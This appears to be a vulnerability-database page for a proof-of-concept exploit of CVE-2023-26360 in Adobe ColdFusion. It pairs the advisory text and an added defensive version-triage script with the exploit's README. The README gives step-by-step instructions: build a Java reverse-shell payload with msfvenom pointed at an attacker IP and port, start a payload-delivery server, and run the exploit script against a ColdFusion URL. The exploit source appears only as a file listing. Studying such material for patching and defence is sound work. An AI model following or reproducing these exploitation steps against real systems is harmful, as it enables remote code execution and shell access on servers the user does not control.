
CVE-2023-26360 PoC — Adobe ColdFusion Improper Access Control Arbitrary code execution

Associated Vulnerability
Title: Adobe ColdFusion Improper Access Control Arbitrary code execution (CVE-2023-26360)
Description: Adobe ColdFusion versions 2018 Update 15 (and earlier) and 2021 Update 5 (and earlier) are affected by an Improper Access Control vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction.
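The affected ranges in the description above are the one fact on this page a defender can act on directly. The following Python inventory check is an added example, not code from the PoC repository or from Adobe: it encodes the two thresholds (2018 Update 15, 2021 Update 5) and classifies hosts as affected, patched, or not covered by the advisory text. The banner format `ColdFusion <year> Update <n>`, the `host: banner` inventory lines, and all hostnames are constructed assumptions for the demonstration; real ColdFusion version strings look different and the parser would need to be adapted to whatever your asset inventory records.

```python
"""Affected-version triage for CVE-2023-26360 (added example, not the PoC's code).

Thresholds come from the advisory text on this page: ColdFusion 2018 Update 15
and earlier, and ColdFusion 2021 Update 5 and earlier, are affected.
The banner format "ColdFusion <year> Update <n>" is an assumption made here.
"""
import re
from typing import Optional, Tuple

# Highest affected update per release line, taken from the advisory description.
LAST_AFFECTED_UPDATE = {2018: 15, 2021: 5}

# Assumed banner format; adapt to the format your inventory actually stores.
_VERSION_RE = re.compile(r"ColdFusion\s+(\d{4})(?:\s+Update\s+(\d+))?", re.IGNORECASE)


def parse_version(text: str) -> Optional[Tuple[int, int]]:
    """Return (release, update) from a banner like 'ColdFusion 2021 Update 3'.

    A release with no 'Update' suffix is treated as update 0 (the base release).
    Returns None when no version can be recognised.
    """
    m = _VERSION_RE.search(text)
    if not m:
        return None
    return int(m.group(1)), int(m.group(2) or 0)


def is_affected(release: int, update: int) -> Optional[bool]:
    """True if inside the affected range, False if beyond the last affected
    update, None if the release line is not mentioned in the advisory text."""
    last = LAST_AFFECTED_UPDATE.get(release)
    if last is None:
        return None
    return update <= last


def triage_inventory(lines):
    """Classify inventory lines of the (constructed) form '<host>: <banner>'."""
    report = {"affected": [], "patched": [], "unknown": []}
    for line in lines:
        host, _, banner = line.partition(":")
        host = host.strip()
        parsed = parse_version(banner)
        if parsed is None:
            report["unknown"].append(host)
            continue
        verdict = is_affected(*parsed)
        if verdict is None:
            report["unknown"].append(host)
        elif verdict:
            report["affected"].append(host)
        else:
            report["patched"].append(host)
    return report


# Constructed sample inventory: hostnames and versions are made up for the example.
SAMPLE_INVENTORY = [
    "cf-prod-01: ColdFusion 2021 Update 5",
    "cf-prod-02: ColdFusion 2021 Update 6",
    "cf-legacy-01: ColdFusion 2018 Update 15",
    "cf-legacy-02: ColdFusion 2018 Update 16",
    "cf-dev-01: ColdFusion 2021",
    "cf-old-01: ColdFusion 2016 Update 17",
    "cf-mystery: no banner captured",
]

if __name__ == "__main__":
    for bucket, hosts in triage_inventory(SAMPLE_INVENTORY).items():
        print(f"{bucket}: {', '.join(hosts) or '-'}")
```

Hosts that land in `unknown` (an unparseable banner, or a release line such as 2016 that the advisory text does not mention) should be checked by hand rather than assumed safe; the script deliberately does not guess about versions the page says nothing about.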
Description
Exploit for Remote Code Execution in ColdFusion 2021 (CVE-2023-26360)
Readme
# CVE-2023-26360 - Remote Code Execution on ColdFusion 2021

> Sometimes the scripts don't work on the first attempt. Try a few times to make them work.

## How to execute

### Create a payload with msfvenom

```
msfvenom -p java/shell_reverse_tcp LHOST=192.168.56.1 LPORT=4444 > file.java
```

### Starting `server.py`

- This server sends the payload to the ColdFusion server after the initial access obtained with `cve-2023-26360.py`, so it needs to be started first.

```
python3 server.py 8000
```

- The argument `8000` is the port that the server will listen on.

- Note that line 12 of `server.py` configures the IP address the server binds to, so change it to match the host running `server.py`:

```
s.bind(('192.168.56.1',port))
```

### Run `cve-2023-26360.py`

- To run the exploit, execute:

```
python3 cve-2023-26360.py 8000
```

- As with `server.py`, the argument `8000` is the port that `server.py` listens on, so it must be the same in both commands.

- Line 8 of `cve-2023-26360.py` sets the IP address that `server.py` listens on; it must match the address configured in `server.py`.

- Line 11 of `cve-2023-26360.py` sets the address of the ColdFusion server, so change it:

```
url = "http://192.168.56.102:8500"
```

## Tested on
- ColdFusion 2021 - Windows Server 2019

File Snapshot

[4.0K] /data/pocs/efefb33ced37dbc64da9a7092650b1f64e292d77
├── [2.2K] cve-2023-26360.py
├── [1.2K] README.md
└── [ 972] server.py

1 directory, 3 files